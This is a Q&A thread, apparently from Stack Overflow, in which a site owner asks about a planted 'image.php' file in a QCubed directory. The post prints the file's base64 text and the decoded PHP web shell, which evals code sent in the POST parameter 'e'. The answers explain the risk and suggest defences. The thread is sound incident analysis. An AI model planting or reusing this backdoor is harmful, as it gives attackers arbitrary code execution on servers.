# What does eval on base64 encoded $_POST['e'] variable actually do?

Tags: php, security, eval

Ok so here's what I've googled:

It seems there is an uploaded file named "image.php" that is uploaded in a qcubed directory.

That image.php file contains the following base64 code:

```
aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==
```

decoded it adds to this:

```
if(isset($_POST['e']))

eval(base64_decode($_POST['e']));

echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032';
```

Searching for the outputed string I found simillar qcubed vulnerabilities on other sites.

Decoding the last echoed string I got:

```
196.231-172.28:ifacermpubmice:afac42eri02
```

Which I really don`t understand what it does (using:http://ostermiller.org/calc/encode.html).

Can you please explain me what in particular I`m facing here? 
What security vulnerability I should adress in order to fix this?

Comment: I found out what it might contain, it seems it resembles the passwd file structure, take a look here http://www.regatta.cmc.msu.ru/doc/usr/share/man/info/ru_RU/a_doc_lib/files/aixfiles/passwd.htm, maybe this will help somebody.

Comment: You said you uploaded to a qcubed directory. Can you please explain about what you mean by a 'qcubed' directory?

Comment: @VaibhavKaushal QCubed is a Framework and the qcubed directory in non-esential.

Answer (score 5, accepted):

The script will execute any PHP code it gets from the `e` POST variable, which of course is a horrible, most dangerous vulnerability.

The `echo` statement *might* be a confirmation for the attacking script that the correct version is installed or something.

However, this is only dangerous if the image.php file can actually be executed in that directory. It's hard to give advice on what to do without knowing how the file got there in the first place.

Comment: That`s exactly it. I don`t actually know how it got there, it seems other directories from qcubed have been affected. Anyway, the directory and thus the file cannot be directly accessed, unless this attack is mixed with some other attack that I haven`t yet found out about it. Any tips, advice? Another thing I have done is limited the directory only to the local area by a limit clause with a dedicated .htaccess in the qcubed root directory. Again, any tips and advice?

Comment: @Gabriel hard to tell: It could be that a vulnerability in Gcubed was used to plant those files in every directory possible. It could also have been a breach in some other web application (An outdated Wordpress version would be a likely culprit). If it were your FTP account that is compromised, the attacker would hardly have bothered with painstakingly copying files like that - I can't know for sure of course, but this really smells like a vulnerability that was exploited by a script. Maybe look in Gcubed's forums whether any known vulnerabilities exist

Comment: Be sure that those uploaded files also cannot be included by legal scripts (e.g. using unvalidated user-input), unfortunately this can't be restricted with htaccess.

Answer (score 2):

Most likely a script kiddie used an [exploit](http://www.exploit-db.com/) to break into your site. Make sure your PHP application and libraries are up to date.